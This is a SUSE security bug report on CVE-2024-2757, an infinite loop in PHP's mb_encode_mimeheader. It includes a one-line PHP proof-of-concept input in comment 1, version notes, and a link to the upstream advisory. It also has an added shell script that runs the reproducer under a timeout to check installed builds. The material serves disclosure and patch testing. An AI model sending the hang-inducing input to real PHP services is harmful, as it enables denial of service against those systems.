Bug 1222855 (CVE-2024-2757)

Summary: VUL-0: CVE-2024-2757: php7,php72,php74,php8: php: mb_encode_mimeheader runs endlessly for some inputs
Product: [Novell Products] SUSE Security Incidents
Reporter: SMASH SMASH <smash_bz>
Component: Incidents
Assignee: Security Team bot <security-team>
Status: RESOLVED FIXED
QA Contact: Security Team bot <security-team>
Severity: Major
Priority: P3 - Medium
CC: meissner
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/401685/
Whiteboard: CVSSv3.1:SUSE:CVE-2024-2757:7.5:(AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Comment 1 Marcus Meissner 2024-04-15 15:37:36 UTC
QA REPRODUCER: 

Summary
-------
Certain inputs provided to mb_encode_mimeheader trigger an endless loop.

Details
-------
A discernible pattern has not yet been identified, but a specific string
consistently reproduces the issue.

PoC
---
In PHP 8.3.3, execute:

    <?php
    mb_internal_encoding('UTF-8');
    mb_encode_mimeheader(",9868949,9868978,9869015,9689100,9869121,9869615,9870690,9867116,98558119861183. ", "utf-8", "B");

The mb_encode_mimeheader function seems to enter an infinite loop and fails to return.
Comment 2 Marcus Meissner 2024-04-16 07:38:28 UTC
zypper in php-mbstring

before reproducing
Comment 3 Marcus Meissner 2024-04-16 07:39:52 UTC
does not seem to affect 8.1 from phub
affects factory with 8.3.4
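
An added example, not part of the bug report or of any SUSE QA tooling: a shell wrapper that runs the reproducer from comment 1 under a time limit, so that checking an installed PHP build reports the hang instead of blocking the test run. The function name, its return codes and the 5-second default are assumptions of this example; it needs a `php` CLI with mbstring loaded (comment 2) and coreutils `timeout`.

```shell
#!/bin/sh
# Added example: bounded run of the mb_encode_mimeheader reproducer (comment 1).
# Return codes (chosen for this example, not defined by PHP or SUSE):
#   0 = call returned, 1 = no return within the limit (hang), 2 = could not test
check_mimeheader_hang() {
    php_bin=${1:-php}   # PHP CLI binary to test
    limit=${2:-5}       # seconds to wait before declaring a hang

    command -v "$php_bin" >/dev/null 2>&1 || return 2
    command -v timeout    >/dev/null 2>&1 || return 2

    # PHP exits with 3 when mbstring is not loaded (see comment 2),
    # so a missing extension is not mistaken for a fixed build.
    rc=0
    timeout "$limit" "$php_bin" -r '
        if (!function_exists("mb_encode_mimeheader")) { exit(3); }
        mb_internal_encoding("UTF-8");
        mb_encode_mimeheader(",9868949,9868978,9869015,9689100,9869121,9869615,9870690,9867116,98558119861183. ", "utf-8", "B");
    ' >/dev/null 2>&1 || rc=$?

    case $rc in
        0)   return 0 ;;  # the call returned
        124) return 1 ;;  # timeout(1) had to stop the process
        *)   return 2 ;;  # extension missing or another failure
    esac
}

# Stand-alone use: check the php found on PATH (or $PHP_BIN) and print the code.
verdict=0
check_mimeheader_hang "${PHP_BIN:-php}" 5 || verdict=$?
echo "mb_encode_mimeheader check: code $verdict (0=returns, 1=hangs, 2=untested)"
```
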
Comment 4 Petr Gajdos 2024-04-16 08:33:15 UTC
Advisory related to this CVE:
https://github.com/php/php-src/security/advisories/GHSA-fjp9-9hwx-59fq
Comment 6 Petr Gajdos 2024-04-19 08:39:40 UTC
Submitted for: Tumbleweed only, 8.3 issue (mb_mime_header_encode)
Comment 7 Andrea Mattiazzo 2024-05-31 13:14:02 UTC
All done, closing.